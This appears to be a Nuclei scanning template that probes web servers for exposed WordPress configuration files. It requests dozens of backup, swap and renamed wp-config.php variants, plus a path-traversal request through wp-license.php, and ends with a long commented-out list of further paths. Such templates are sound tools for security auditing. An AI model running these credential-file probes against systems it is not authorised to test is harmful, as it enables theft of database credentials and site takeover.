id: wp-config-disclosure

info:
  name: WordPress Config Disclosure Fuzzing Template
  author: 0xAI
  severity: high
  description: Fuzzes for various wp-config.php file variants.

http:
  #===SEARCH-VULN-FILE===#
  - method: GET
    path:
      - "{{BaseURL}}/wp-config.PHP"
      - "{{BaseURL}}/wp-config.php"
      - "{{BaseURL}}/wp-config.php.bak"
      - "{{BaseURL}}/.wp-config.php.swp"
      - "{{BaseURL}}/wp-config.inc"
      - "{{BaseURL}}/wp-config.old"
      - "{{BaseURL}}/wp-config.txt"
      - "{{BaseURL}}/wp-config.html"
      - "{{BaseURL}}/wp-config.php.dist"
      - "{{BaseURL}}/wp-config.php.inc"
      - "{{BaseURL}}/wp-config.php.old"
      - "{{BaseURL}}/wp-config-php.save"
      - "{{BaseURL}}/wp-config.php.swp"
      - "{{BaseURL}}/wp-config.php.txt"
      - "{{BaseURL}}/wp-config.php.zip"
      - "{{BaseURL}}/wp-config.php.html"
      - "{{BaseURL}}/wp-config.php~"
      - "{{BaseURL}}/wp-config.new"
      - "{{BaseURL}}/wp-config.php_"
      - "{{BaseURL}}/wp-config.php-backup"
      - '{{BaseURL}}/wp-config-backup.txt'      
      - "{{BaseURL}}/%c0"
      - '{{BaseURL}}/wp-config.php.orig'
      - '{{BaseURL}}/wp-config.php.original'
      - '{{BaseURL}}/_wpeprivate/config.json'
      - '{{BaseURL}}/config.php.zip'
      - '{{BaseURL}}/config.php.tar.gz'
      - '{{BaseURL}}/config.php.new'
      - '{{BaseURL}}/common/config.php.new'
      - '{{BaseURL}}/wp-config.php.bk'
      - "{{BaseURL}}/backup/wp-config.php.save"
      - "{{BaseURL}}/backups/wp-config.php.save"    
      - "{{BaseURL}}/blog/wp-config.php.save"  
      - '{{BaseURL}}/wp-license.php?file=../..//wp-config'      
#
#      
#      - '{{BaseURL}}/wp-config.php'
#      - '{{BaseURL}}//wp-config.php'      
#      - '{{BaseURL}}/.wp-config.php'      
#      - '{{BaseURL}}/wp-config - Copy.php'
#      - '{{BaseURL}}/wp-config copy.php'
#      - '{{BaseURL}}/wp-config'
#      - '{{BaseURL}}/wp-config-backup'
#      - '{{BaseURL}}/wp-config-backup.php'
#      - '{{BaseURL}}/wp-config-backup.txt'
#      - '{{BaseURL}}/wp-config-backup.txt'      
#      - '{{BaseURL}}/wp-config-backup1.txt'
#      - '{{BaseURL}}/wp-config-good'
#      - '{{BaseURL}}/wp-config-php.save'
#      - '{{BaseURL}}/wp-config-sample.php'
#      - '{{BaseURL}}/wp-config-sample.php.bak'
#      - '{{BaseURL}}/wp-config-sample.php~'
#      - '{{BaseURL}}/wp-config.ORG'
#      - '{{BaseURL}}/wp-config.PHP'
#      - '{{BaseURL}}/wp-config.backup'
#      - '{{BaseURL}}/wp-config.bak'
#      - '{{BaseURL}}/wp-config.bkp'
#      - '{{BaseURL}}/wp-config.cfg'
#      - '{{BaseURL}}/wp-config.conf'
#      - '{{BaseURL}}/wp-config.data'
#      - '{{BaseURL}}/wp-config.dump'
#      - '{{BaseURL}}/wp-config.good'
#      - '{{BaseURL}}/wp-config.htm'
#      - '{{BaseURL}}/wp-config.html'
#      - '{{BaseURL}}/wp-config.inc'
#      - '{{BaseURL}}/wp-config.local.php'
#      - '{{BaseURL}}/wp-config.new'
#      - '{{BaseURL}}/wp-config.old'
#      - '{{BaseURL}}/wp-config.old.old'
#      - '{{BaseURL}}/wp-config.orig'
#      - '{{BaseURL}}/wp-config.original'
#      - '{{BaseURL}}/wp-config.php-'
#      - '{{BaseURL}}/wp-config.php-backup'
#      - '{{BaseURL}}/wp-config.php-bak'
#      - '{{BaseURL}}/wp-config.php-n'
#      - '{{BaseURL}}/wp-config.php-o'
#      - '{{BaseURL}}/wp-config.php-old'
#      - '{{BaseURL}}/wp-config.php-original'
#      - '{{BaseURL}}/wp-config.php-save'
#      - '{{BaseURL}}/wp-config.php-work'
#      - '{{BaseURL}}/wp-config.php.0'
#      - '{{BaseURL}}/wp-config.php.1'
#      - '{{BaseURL}}/wp-config.php.2'
#      - '{{BaseURL}}/wp-config.php.3'
#      - '{{BaseURL}}/wp-config.php.4'
#      - '{{BaseURL}}/wp-config.php.5'
#      - '{{BaseURL}}/wp-config.php.6'
#      - '{{BaseURL}}/wp-config.php.7'
#      - '{{BaseURL}}/wp-config.php.8'
#      - '{{BaseURL}}/wp-config.php.9'
#      - '{{BaseURL}}/wp-config.php.a'
#      - '{{BaseURL}}/wp-config.php.aws'
#      - '{{BaseURL}}/wp-config.php.azure'
#      - '{{BaseURL}}/wp-config.php.b'
#      - '{{BaseURL}}/wp-config.php.back'
#      - '{{BaseURL}}/wp-config.php.backup'
#      - '{{BaseURL}}/wp-config.php.backup.txt'
#      - '{{BaseURL}}/wp-config.php.bak'
#      - '{{BaseURL}}/wp-config.php.bak1'
#      - '{{BaseURL}}/wp-config.php.bakup'
#      - '{{BaseURL}}/wp-config.php.bk'
#      - '{{BaseURL}}/wp-config.php.bkp'
#      - '{{BaseURL}}/wp-config.php.c'
#      - '{{BaseURL}}/wp-config.php.com'
#      - '{{BaseURL}}/wp-config.php.conf'
#      - '{{BaseURL}}/wp-config.php.copy'
#      - '{{BaseURL}}/wp-config.php.core'
#      - '{{BaseURL}}/wp-config.php.cust'
#      - '{{BaseURL}}/wp-config.php.dat'
#      - '{{BaseURL}}/wp-config.php.db'
#      - '{{BaseURL}}/wp-config.php.default'
#      - '{{BaseURL}}/wp-config.php.dev'
#      - '{{BaseURL}}/wp-config.php.disabled'
#      - '{{BaseURL}}/wp-config.php.dist'
#      - '{{BaseURL}}/wp-config.php.dump'
#      - '{{BaseURL}}/wp-config.php.html'
#      - '{{BaseURL}}/wp-config.php.in'
#      - '{{BaseURL}}/wp-config.php.inc'
#      - '{{BaseURL}}/wp-config.php.ini'
#      - '{{BaseURL}}/wp-config.php.jar'
#      - '{{BaseURL}}/wp-config.php.local'
#      - '{{BaseURL}}/wp-config.php.maj'
#      - '{{BaseURL}}/wp-config.php.new'
#      - '{{BaseURL}}/wp-config.php.old'
#      - '{{BaseURL}}/wp-config.php.org'
#      - '{{BaseURL}}/wp-config.php.orig'
#      - '{{BaseURL}}/wp-config.php.original'
#      - '{{BaseURL}}/wp-config.php.pas'
#      - '{{BaseURL}}/wp-config.php.php-bak'
#      - '{{BaseURL}}/wp-config.php.prod'
#      - '{{BaseURL}}/wp-config.php.production'
#      - '{{BaseURL}}/wp-config.php.sample'
#      - '{{BaseURL}}/wp-config.php.sav'
#      - '{{BaseURL}}/wp-config.php.save'
#      - '{{BaseURL}}/wp-config.php.save.1'
#      - '{{BaseURL}}/wp-config.php.saved'
#      - '{{BaseURL}}/wp-config.php.stage'
#      - '{{BaseURL}}/wp-config.php.staging'
#      - '{{BaseURL}}/wp-config.php.swn'
#      - '{{BaseURL}}/wp-config.php.swo'
#      - '{{BaseURL}}/wp-config.php.swp'
#      - '{{BaseURL}}/wp-config.php.tar'
#      - '{{BaseURL}}/wp-config.php.tar.gz'
#      - '{{BaseURL}}/wp-config.php.temp'
#      - '{{BaseURL}}/wp-config.php.test'
#      - '{{BaseURL}}/wp-config.php.tgz'
#      - '{{BaseURL}}/wp-config.php.tmp'
#      - '{{BaseURL}}/wp-config.php.txt'
#      - '{{BaseURL}}/wp-config.php.uk'
#      - '{{BaseURL}}/wp-config.php.us'
#      - '{{BaseURL}}/wp-config.php.war'
#      - '{{BaseURL}}/wp-config.php.zip'
#      - '{{BaseURL}}/wp-config.php1'
#      - '{{BaseURL}}/wp-config.php='
#      - '{{BaseURL}}/wp-config.php_'
#      - '{{BaseURL}}/wp-config.php_1'
#      - '{{BaseURL}}/wp-config.php__'
#      - '{{BaseURL}}/wp-config.php______'
#      - '{{BaseURL}}/wp-config.php__olds'
#      - '{{BaseURL}}/wp-config.php_backup'
#      - '{{BaseURL}}/wp-config.php_bak'
#      - '{{BaseURL}}/wp-config.php_bk'
#      - '{{BaseURL}}/wp-config.php_new'
#      - '{{BaseURL}}/wp-config.php_old'
#      - '{{BaseURL}}/wp-config.php_old2017'
#      - '{{BaseURL}}/wp-config.php_old2018'
#      - '{{BaseURL}}/wp-config.php_old2019'
#      - '{{BaseURL}}/wp-config.php_old2020'
#      - '{{BaseURL}}/wp-config.php_orig'
#      - '{{BaseURL}}/wp-config.php_original'
#      - '{{BaseURL}}/wp-config.phpa'
#      - '{{BaseURL}}/wp-config.phpb'
#      - '{{BaseURL}}/wp-config.phpbak'
#      - '{{BaseURL}}/wp-config.phpc'
#      - '{{BaseURL}}/wp-config.phpd'
#      - '{{BaseURL}}/wp-config.phpn'
#      - '{{BaseURL}}/wp-config.phpnew'
#      - '{{BaseURL}}/wp-config.phpold'
#      - '{{BaseURL}}/wp-config.phporiginal'
#      - '{{BaseURL}}/wp-config.phptmp'
#      - '{{BaseURL}}/wp-config.php~'
#      - '{{BaseURL}}/wp-config.php~~~'
#      - '{{BaseURL}}/wp-config.prod.php.txt'
#      - '{{BaseURL}}/wp-config.save'
#      - '{{BaseURL}}/wp-config.tar'
#      - '{{BaseURL}}/wp-config.temp'
#      - '{{BaseURL}}/wp-config.txt'
#      - '{{BaseURL}}/wp-config.zip'
#      - '{{BaseURL}}/wp-config_backup'
#      - '{{BaseURL}}/wp-config_good'
#      - '{{BaseURL}}/wp-configbak'
#      - '{{BaseURL}}/wp-config~'
#      - '{{BaseURL}}/.wp-config - Copy.php'
#      - '{{BaseURL}}/.wp-config copy.php'
#      - '{{BaseURL}}/.wp-config'
#      - '{{BaseURL}}/.wp-config-backup'
#      - '{{BaseURL}}/.wp-config-backup.php'
#      - '{{BaseURL}}/.wp-config-backup.txt'
#      - '{{BaseURL}}/.wp-config-backup.txt'      
#      - '{{BaseURL}}/.wp-config-backup1.txt'
#      - '{{BaseURL}}/.wp-config-good'
#      - '{{BaseURL}}/.wp-config-php.save'
#      - '{{BaseURL}}/.wp-config-sample.php'
#      - '{{BaseURL}}/.wp-config-sample.php.bak'
#      - '{{BaseURL}}/.wp-config-sample.php~'
#      - '{{BaseURL}}/.wp-config.ORG'
#      - '{{BaseURL}}/.wp-config.PHP'
#      - '{{BaseURL}}/.wp-config.backup'
#      - '{{BaseURL}}/.wp-config.bak'
#      - '{{BaseURL}}/.wp-config.bkp'
#      - '{{BaseURL}}/.wp-config.cfg'
#      - '{{BaseURL}}/.wp-config.conf'
#      - '{{BaseURL}}/.wp-config.data'
#      - '{{BaseURL}}/.wp-config.dump'
#      - '{{BaseURL}}/.wp-config.good'
#      - '{{BaseURL}}/.wp-config.htm'
#      - '{{BaseURL}}/.wp-config.html'
#      - '{{BaseURL}}/.wp-config.inc'
#      - '{{BaseURL}}/.wp-config.local.php'
#      - '{{BaseURL}}/.wp-config.new'
#      - '{{BaseURL}}/.wp-config.old'
#      - '{{BaseURL}}/.wp-config.old.old'
#      - '{{BaseURL}}/.wp-config.orig'
#      - '{{BaseURL}}/.wp-config.original'
#      - '{{BaseURL}}/.wp-config.php-'
#      - '{{BaseURL}}/.wp-config.php-backup'
#      - '{{BaseURL}}/.wp-config.php-bak'
#      - '{{BaseURL}}/.wp-config.php-n'
#      - '{{BaseURL}}/.wp-config.php-o'
#      - '{{BaseURL}}/.wp-config.php-old'
#      - '{{BaseURL}}/.wp-config.php-original'
#      - '{{BaseURL}}/.wp-config.php-save'
#      - '{{BaseURL}}/.wp-config.php-work'
#      - '{{BaseURL}}/.wp-config.php.0'
#      - '{{BaseURL}}/.wp-config.php.1'
#      - '{{BaseURL}}/.wp-config.php.2'
#      - '{{BaseURL}}/.wp-config.php.3'
#      - '{{BaseURL}}/.wp-config.php.4'
#      - '{{BaseURL}}/.wp-config.php.5'
#      - '{{BaseURL}}/.wp-config.php.6'
#      - '{{BaseURL}}/.wp-config.php.7'
#      - '{{BaseURL}}/.wp-config.php.8'
#      - '{{BaseURL}}/.wp-config.php.9'
#      - '{{BaseURL}}/.wp-config.php.a'
#      - '{{BaseURL}}/.wp-config.php.aws'
#      - '{{BaseURL}}/.wp-config.php.azure'
#      - '{{BaseURL}}/.wp-config.php.b'
#      - '{{BaseURL}}/.wp-config.php.back'
#      - '{{BaseURL}}/.wp-config.php.backup'
#      - '{{BaseURL}}/.wp-config.php.backup.txt'
#      - '{{BaseURL}}/.wp-config.php.bak'
#      - '{{BaseURL}}/.wp-config.php.bak1'
#      - '{{BaseURL}}/.wp-config.php.bakup'
#      - '{{BaseURL}}/.wp-config.php.bk'
#      - '{{BaseURL}}/.wp-config.php.bkp'
#      - '{{BaseURL}}/.wp-config.php.c'
#      - '{{BaseURL}}/.wp-config.php.com'
#      - '{{BaseURL}}/.wp-config.php.conf'
#      - '{{BaseURL}}/.wp-config.php.copy'
#      - '{{BaseURL}}/.wp-config.php.core'
#      - '{{BaseURL}}/.wp-config.php.cust'
#      - '{{BaseURL}}/.wp-config.php.dat'
#      - '{{BaseURL}}/.wp-config.php.db'
#      - '{{BaseURL}}/.wp-config.php.default'
#      - '{{BaseURL}}/.wp-config.php.dev'
#      - '{{BaseURL}}/.wp-config.php.disabled'
#      - '{{BaseURL}}/.wp-config.php.dist'
#      - '{{BaseURL}}/.wp-config.php.dump'
#      - '{{BaseURL}}/.wp-config.php.html'
#      - '{{BaseURL}}/.wp-config.php.in'
#      - '{{BaseURL}}/.wp-config.php.inc'
#      - '{{BaseURL}}/.wp-config.php.ini'
#      - '{{BaseURL}}/.wp-config.php.jar'
#      - '{{BaseURL}}/.wp-config.php.local'
#      - '{{BaseURL}}/.wp-config.php.maj'
#      - '{{BaseURL}}/.wp-config.php.new'
#      - '{{BaseURL}}/.wp-config.php.old'
#      - '{{BaseURL}}/.wp-config.php.org'
#      - '{{BaseURL}}/.wp-config.php.orig'
#      - '{{BaseURL}}/.wp-config.php.original'
#      - '{{BaseURL}}/.wp-config.php.pas'
#      - '{{BaseURL}}/.wp-config.php.php-bak'
#      - '{{BaseURL}}/.wp-config.php.prod'
#      - '{{BaseURL}}/.wp-config.php.production'
#      - '{{BaseURL}}/.wp-config.php.sample'
#      - '{{BaseURL}}/.wp-config.php.sav'
#      - '{{BaseURL}}/.wp-config.php.save'
#      - '{{BaseURL}}/.wp-config.php.save.1'
#      - '{{BaseURL}}/.wp-config.php.saved'
#      - '{{BaseURL}}/.wp-config.php.stage'
#      - '{{BaseURL}}/.wp-config.php.staging'
#      - '{{BaseURL}}/.wp-config.php.swn'
#      - '{{BaseURL}}/.wp-config.php.swo'
#      - '{{BaseURL}}/.wp-config.php.swp'
#      - '{{BaseURL}}/.wp-config.php.tar'
#      - '{{BaseURL}}/.wp-config.php.tar.gz'
#      - '{{BaseURL}}/.wp-config.php.temp'
#      - '{{BaseURL}}/.wp-config.php.test'
#      - '{{BaseURL}}/.wp-config.php.tgz'
#      - '{{BaseURL}}/.wp-config.php.tmp'
#      - '{{BaseURL}}/.wp-config.php.txt'
#      - '{{BaseURL}}/.wp-config.php.uk'
#      - '{{BaseURL}}/.wp-config.php.us'
#      - '{{BaseURL}}/.wp-config.php.war'
#      - '{{BaseURL}}/.wp-config.php.zip'
#      - '{{BaseURL}}/.wp-config.php1'
#      - '{{BaseURL}}/.wp-config.php='
#      - '{{BaseURL}}/.wp-config.php_'
#      - '{{BaseURL}}/.wp-config.php_1'
#      - '{{BaseURL}}/.wp-config.php__'
#      - '{{BaseURL}}/.wp-config.php______'
#      - '{{BaseURL}}/.wp-config.php__olds'
#      - '{{BaseURL}}/.wp-config.php_backup'
#      - '{{BaseURL}}/.wp-config.php_bak'
#      - '{{BaseURL}}/.wp-config.php_bk'
#      - '{{BaseURL}}/.wp-config.php_new'
#      - '{{BaseURL}}/.wp-config.php_old'
#      - '{{BaseURL}}/.wp-config.php_old2017'
#      - '{{BaseURL}}/.wp-config.php_old2018'
#      - '{{BaseURL}}/.wp-config.php_old2019'
#      - '{{BaseURL}}/.wp-config.php_old2020'
#      - '{{BaseURL}}/.wp-config.php_orig'
#      - '{{BaseURL}}/.wp-config.php_original'
#      - '{{BaseURL}}/.wp-config.phpa'
#      - '{{BaseURL}}/.wp-config.phpb'
#      - '{{BaseURL}}/.wp-config.phpbak'
#      - '{{BaseURL}}/.wp-config.phpc'
#      - '{{BaseURL}}/.wp-config.phpd'
#      - '{{BaseURL}}/.wp-config.phpn'
#      - '{{BaseURL}}/.wp-config.phpnew'
#      - '{{BaseURL}}/.wp-config.phpold'
#      - '{{BaseURL}}/.wp-config.phporiginal'
#      - '{{BaseURL}}/.wp-config.phptmp'
#      - '{{BaseURL}}/.wp-config.php~'
#      - '{{BaseURL}}/.wp-config.php~~~'
#      - '{{BaseURL}}/.wp-config.prod.php.txt'
#      - '{{BaseURL}}/.wp-config.save'
#      - '{{BaseURL}}/.wp-config.tar'
#      - '{{BaseURL}}/.wp-config.temp'
#      - '{{BaseURL}}/.wp-config.txt'
#      - '{{BaseURL}}/.wp-config.zip'
#      - '{{BaseURL}}/.wp-config_backup'
#      - '{{BaseURL}}/.wp-config_good'
#      - '{{BaseURL}}/.wp-configbak'
#      - '{{BaseURL}}/.wp-config~'      
#      - '{{BaseURL}}/#admin/wp-config.php#'
#      - '{{BaseURL}}/#wordpress/wp-config.php#'
#      - '{{BaseURL}}/#wp-config.php#'
#      - '{{BaseURL}}/#wp/wp-config.php#'
#      - '{{BaseURL}}/%c0'
#      - '{{BaseURL}}/.admin/wp-config.php.swo'
#      - '{{BaseURL}}/.admin/wp-config.sadmin/wp'
#      - '{{BaseURL}}/.wordpress/wp-config.php.swo'
#      - '{{BaseURL}}/.wordpress/wp-config.swordpress/wp'
#      - '{{BaseURL}}/.wp-config.php.swo'
#      - '{{BaseURL}}/.wp-config.php.swp'
#      - '{{BaseURL}}/.wp-config.swp'
#      - '{{BaseURL}}/.wp/wp-config.php.swo'
#      - '{{BaseURL}}/.wp/wp-config.swp/wp'
#      - '{{BaseURL}}/WP/wp-config.php'
#      - '{{BaseURL}}/Wordpress/wp-config.php'          
#      - '{{BaseURL}}/_wpeprivate/config.json'
#      - '{{BaseURL}}/admin/wp-config - Copy.php'
#      - '{{BaseURL}}/admin/wp-config copy.php'
#      - '{{BaseURL}}/admin/wp-config'
#      - '{{BaseURL}}/admin/wp-config-backup'
#      - '{{BaseURL}}/admin/wp-config-backup.php'
#      - '{{BaseURL}}/admin/wp-config-backup.txt'
#      - '{{BaseURL}}/admin/wp-config-backup1.txt'
#      - '{{BaseURL}}/admin/wp-config-good'
#      - '{{BaseURL}}/admin/wp-config-sample.php'
#      - '{{BaseURL}}/admin/wp-config-sample.php.bak'
#      - '{{BaseURL}}/admin/wp-config-sample.php~'
#      - '{{BaseURL}}/admin/wp-config.ORG'
#      - '{{BaseURL}}/admin/wp-config.backup'
#      - '{{BaseURL}}/admin/wp-config.bak'
#      - '{{BaseURL}}/admin/wp-config.bkp'
#      - '{{BaseURL}}/admin/wp-config.cfg'
#      - '{{BaseURL}}/admin/wp-config.conf'
#      - '{{BaseURL}}/admin/wp-config.data'
#      - '{{BaseURL}}/admin/wp-config.dump'
#      - '{{BaseURL}}/admin/wp-config.good'
#      - '{{BaseURL}}/admin/wp-config.htm'
#      - '{{BaseURL}}/admin/wp-config.html'
#      - '{{BaseURL}}/admin/wp-config.inc'
#      - '{{BaseURL}}/admin/wp-config.local.php'
#      - '{{BaseURL}}/admin/wp-config.old'
#      - '{{BaseURL}}/admin/wp-config.old.old'
#      - '{{BaseURL}}/admin/wp-config.orig'
#      - '{{BaseURL}}/admin/wp-config.original'
#      - '{{BaseURL}}/admin/wp-config.php'
#      - '{{BaseURL}}/admin/wp-config.php-'
#      - '{{BaseURL}}/admin/wp-config.php-backup'
#      - '{{BaseURL}}/admin/wp-config.php-bak'
#      - '{{BaseURL}}/admin/wp-config.php-n'
#      - '{{BaseURL}}/admin/wp-config.php-o'
#      - '{{BaseURL}}/admin/wp-config.php-old'
#      - '{{BaseURL}}/admin/wp-config.php-original'
#      - '{{BaseURL}}/admin/wp-config.php-save'
#      - '{{BaseURL}}/admin/wp-config.php-work'
#      - '{{BaseURL}}/admin/wp-config.php.0'
#      - '{{BaseURL}}/admin/wp-config.php.1'
#      - '{{BaseURL}}/admin/wp-config.php.2'
#      - '{{BaseURL}}/admin/wp-config.php.3'
#      - '{{BaseURL}}/admin/wp-config.php.4'
#      - '{{BaseURL}}/admin/wp-config.php.5'
#      - '{{BaseURL}}/admin/wp-config.php.6'
#      - '{{BaseURL}}/admin/wp-config.php.7'
#      - '{{BaseURL}}/admin/wp-config.php.8'
#      - '{{BaseURL}}/admin/wp-config.php.9'
#      - '{{BaseURL}}/admin/wp-config.php.a'
#      - '{{BaseURL}}/admin/wp-config.php.aws'
#      - '{{BaseURL}}/admin/wp-config.php.azure'
#      - '{{BaseURL}}/admin/wp-config.php.b'
#      - '{{BaseURL}}/admin/wp-config.php.backup'
#      - '{{BaseURL}}/admin/wp-config.php.backup.txt'
#      - '{{BaseURL}}/admin/wp-config.php.bak'
#      - '{{BaseURL}}/admin/wp-config.php.bak1'
#      - '{{BaseURL}}/admin/wp-config.php.bk'
#      - '{{BaseURL}}/admin/wp-config.php.bkp'
#      - '{{BaseURL}}/admin/wp-config.php.c'
#      - '{{BaseURL}}/admin/wp-config.php.com'
#      - '{{BaseURL}}/admin/wp-config.php.cust'
#      - '{{BaseURL}}/admin/wp-config.php.dev'
#      - '{{BaseURL}}/admin/wp-config.php.disabled'
#      - '{{BaseURL}}/admin/wp-config.php.dist'
#      - '{{BaseURL}}/admin/wp-config.php.dump'
#      - '{{BaseURL}}/admin/wp-config.php.html'
#      - '{{BaseURL}}/admin/wp-config.php.in'
#      - '{{BaseURL}}/admin/wp-config.php.inc'
#      - '{{BaseURL}}/admin/wp-config.php.local'
#      - '{{BaseURL}}/admin/wp-config.php.maj'
#      - '{{BaseURL}}/admin/wp-config.php.new'
#      - '{{BaseURL}}/admin/wp-config.php.old'
#      - '{{BaseURL}}/admin/wp-config.php.org'
#      - '{{BaseURL}}/admin/wp-config.php.orig'
#      - '{{BaseURL}}/admin/wp-config.php.original'
#      - '{{BaseURL}}/admin/wp-config.php.php-bak'
#      - '{{BaseURL}}/admin/wp-config.php.prod'
#      - '{{BaseURL}}/admin/wp-config.php.production'
#      - '{{BaseURL}}/admin/wp-config.php.sadmin/wp'
#      - '{{BaseURL}}/admin/wp-config.php.sample'
#      - '{{BaseURL}}/admin/wp-config.php.save'
#      - '{{BaseURL}}/admin/wp-config.php.save.1'
#      - '{{BaseURL}}/admin/wp-config.php.stage'
#      - '{{BaseURL}}/admin/wp-config.php.staging'
#      - '{{BaseURL}}/admin/wp-config.php.swn'
#      - '{{BaseURL}}/admin/wp-config.php.swo'
#      - '{{BaseURL}}/admin/wp-config.php.tar'
#      - '{{BaseURL}}/admin/wp-config.php.temp'
#      - '{{BaseURL}}/admin/wp-config.php.tmp'
#      - '{{BaseURL}}/admin/wp-config.php.txt'
#      - '{{BaseURL}}/admin/wp-config.php.uk'
#      - '{{BaseURL}}/admin/wp-config.php.us'
#      - '{{BaseURL}}/admin/wp-config.php1'
#      - '{{BaseURL}}/admin/wp-config.php='
#      - '{{BaseURL}}/admin/wp-config.php_'
#      - '{{BaseURL}}/admin/wp-config.php_1'
#      - '{{BaseURL}}/admin/wp-config.php__'
#      - '{{BaseURL}}/admin/wp-config.php______'
#      - '{{BaseURL}}/admin/wp-config.php__olds'
#      - '{{BaseURL}}/admin/wp-config.php_backup'
#      - '{{BaseURL}}/admin/wp-config.php_bak'
#      - '{{BaseURL}}/admin/wp-config.php_bk'
#      - '{{BaseURL}}/admin/wp-config.php_new'
#      - '{{BaseURL}}/admin/wp-config.php_old'
#      - '{{BaseURL}}/admin/wp-config.php_old2017'
#      - '{{BaseURL}}/admin/wp-config.php_old2018'
#      - '{{BaseURL}}/admin/wp-config.php_old2019'
#      - '{{BaseURL}}/admin/wp-config.php_old2020'
#      - '{{BaseURL}}/admin/wp-config.php_orig'
#      - '{{BaseURL}}/admin/wp-config.php_original'
#      - '{{BaseURL}}/admin/wp-config.phpa'
#      - '{{BaseURL}}/admin/wp-config.phpb'
#      - '{{BaseURL}}/admin/wp-config.phpbak'
#      - '{{BaseURL}}/admin/wp-config.phpc'
#      - '{{BaseURL}}/admin/wp-config.phpd'
#      - '{{BaseURL}}/admin/wp-config.phpn'
#      - '{{BaseURL}}/admin/wp-config.phpnew'
#      - '{{BaseURL}}/admin/wp-config.phpold'
#      - '{{BaseURL}}/admin/wp-config.phporiginal'
#      - '{{BaseURL}}/admin/wp-config.phptmp'
#      - '{{BaseURL}}/admin/wp-config.php~'
#      - '{{BaseURL}}/admin/wp-config.php~~~'
#      - '{{BaseURL}}/admin/wp-config.prod.php.txt'
#      - '{{BaseURL}}/admin/wp-config.save'
#      - '{{BaseURL}}/admin/wp-config.tar'
#      - '{{BaseURL}}/admin/wp-config.temp'
#      - '{{BaseURL}}/admin/wp-config.txt'
#      - '{{BaseURL}}/admin/wp-config.zip'
#      - '{{BaseURL}}/admin/wp-config_backup'
#      - '{{BaseURL}}/admin/wp-config_good'
#      - '{{BaseURL}}/admin/wp-configbak'
#      - '{{BaseURL}}/admin/wp-config~'
#      - '{{BaseURL}}/backup.admin/wp-config.php'
#      - '{{BaseURL}}/backup.wordpress/wp-config.php'
#      - '{{BaseURL}}/backup.wp-config.php'
#      - '{{BaseURL}}/backup.wp/wp-config.php'
#      - '{{BaseURL}}/backup/wp-config.php.save'
#      - '{{BaseURL}}/backups/wp-config.php.save'    
#      - '{{BaseURL}}/blog/wp-config.php.save'   
#      - '{{BaseURL}}/common/config.php.new'
#      - '{{BaseURL}}/config.php.new'
#      - '{{BaseURL}}/config.php.tar.gz'
#      - '{{BaseURL}}/config.php.zip'
#      - '{{BaseURL}}/wordpress/beta/wp-config.php'
#      - '{{BaseURL}}/wordpress/wp-config - Copy.php'
#      - '{{BaseURL}}/wordpress/wp-config copy.php'
#      - '{{BaseURL}}/wordpress/wp-config'
#      - '{{BaseURL}}/wordpress/wp-config-backup'
#      - '{{BaseURL}}/wordpress/wp-config-backup.php'
#      - '{{BaseURL}}/wordpress/wp-config-backup.txt'
#      - '{{BaseURL}}/wordpress/wp-config-backup1.txt'
#      - '{{BaseURL}}/wordpress/wp-config-good'
#      - '{{BaseURL}}/wordpress/wp-config-sample.php'
#      - '{{BaseURL}}/wordpress/wp-config-sample.php.bak'
#      - '{{BaseURL}}/wordpress/wp-config-sample.php~'
#      - '{{BaseURL}}/wordpress/wp-config.ORG'
#      - '{{BaseURL}}/wordpress/wp-config.backup'
#      - '{{BaseURL}}/wordpress/wp-config.bak'
#      - '{{BaseURL}}/wordpress/wp-config.bkp'
#      - '{{BaseURL}}/wordpress/wp-config.cfg'
#      - '{{BaseURL}}/wordpress/wp-config.conf'
#      - '{{BaseURL}}/wordpress/wp-config.data'
#      - '{{BaseURL}}/wordpress/wp-config.dump'
#      - '{{BaseURL}}/wordpress/wp-config.good'
#      - '{{BaseURL}}/wordpress/wp-config.htm'
#      - '{{BaseURL}}/wordpress/wp-config.html'
#      - '{{BaseURL}}/wordpress/wp-config.inc'
#      - '{{BaseURL}}/wordpress/wp-config.local.php'
#      - '{{BaseURL}}/wordpress/wp-config.old'
#      - '{{BaseURL}}/wordpress/wp-config.old.old'
#      - '{{BaseURL}}/wordpress/wp-config.orig'
#      - '{{BaseURL}}/wordpress/wp-config.original'
#      - '{{BaseURL}}/wordpress/wp-config.php'
#      - '{{BaseURL}}/wordpress/wp-config.php-'
#      - '{{BaseURL}}/wordpress/wp-config.php-backup'
#      - '{{BaseURL}}/wordpress/wp-config.php-bak'
#      - '{{BaseURL}}/wordpress/wp-config.php-n'
#      - '{{BaseURL}}/wordpress/wp-config.php-o'
#      - '{{BaseURL}}/wordpress/wp-config.php-old'
#      - '{{BaseURL}}/wordpress/wp-config.php-original'
#      - '{{BaseURL}}/wordpress/wp-config.php-save'
#      - '{{BaseURL}}/wordpress/wp-config.php-work'
#      - '{{BaseURL}}/wordpress/wp-config.php.0'
#      - '{{BaseURL}}/wordpress/wp-config.php.1'
#      - '{{BaseURL}}/wordpress/wp-config.php.2'
#      - '{{BaseURL}}/wordpress/wp-config.php.3'
#      - '{{BaseURL}}/wordpress/wp-config.php.4'
#      - '{{BaseURL}}/wordpress/wp-config.php.5'
#      - '{{BaseURL}}/wordpress/wp-config.php.6'
#      - '{{BaseURL}}/wordpress/wp-config.php.7'
#      - '{{BaseURL}}/wordpress/wp-config.php.8'
#      - '{{BaseURL}}/wordpress/wp-config.php.9'
#      - '{{BaseURL}}/wordpress/wp-config.php.a'
#      - '{{BaseURL}}/wordpress/wp-config.php.aws'
#      - '{{BaseURL}}/wordpress/wp-config.php.azure'
#      - '{{BaseURL}}/wordpress/wp-config.php.b'
#      - '{{BaseURL}}/wordpress/wp-config.php.backup'
#      - '{{BaseURL}}/wordpress/wp-config.php.backup.txt'
#      - '{{BaseURL}}/wordpress/wp-config.php.bak'
#      - '{{BaseURL}}/wordpress/wp-config.php.bak1'
#      - '{{BaseURL}}/wordpress/wp-config.php.bk'
#      - '{{BaseURL}}/wordpress/wp-config.php.bkp'
#      - '{{BaseURL}}/wordpress/wp-config.php.c'
#      - '{{BaseURL}}/wordpress/wp-config.php.com'
#      - '{{BaseURL}}/wordpress/wp-config.php.cust'
#      - '{{BaseURL}}/wordpress/wp-config.php.dev'
#      - '{{BaseURL}}/wordpress/wp-config.php.disabled'
#      - '{{BaseURL}}/wordpress/wp-config.php.dist'
#      - '{{BaseURL}}/wordpress/wp-config.php.dump'
#      - '{{BaseURL}}/wordpress/wp-config.php.html'
#      - '{{BaseURL}}/wordpress/wp-config.php.in'
#      - '{{BaseURL}}/wordpress/wp-config.php.inc'
#      - '{{BaseURL}}/wordpress/wp-config.php.local'
